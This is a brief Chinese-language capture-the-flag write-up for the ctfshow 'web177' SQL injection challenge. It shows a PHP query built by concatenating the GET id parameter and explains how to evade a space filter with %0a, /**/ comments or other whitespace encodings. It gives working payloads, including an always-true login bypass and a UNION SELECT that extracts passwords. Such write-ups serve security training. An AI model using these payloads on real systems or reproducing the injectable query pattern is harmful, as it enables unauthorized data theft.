web177（+空格过滤）

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单，不宜展示
  }
      

这次发现还多过滤了空格，我们可以用%0a换行符或者/**/注释符绕过(或者%09,%0b,%0c,%0d都可以)，这次我们用万能密码吧，用上面的也可以，不过绕过空格后有点长，后面的注释我们用#的url编码形式%23，payload为  （url写入的）

' or 1=1#

'/**/or/**/1=1%23

 

-1'/**/union/**/select/**/password,2,3/**/from/**/ctfshow_user%23   也行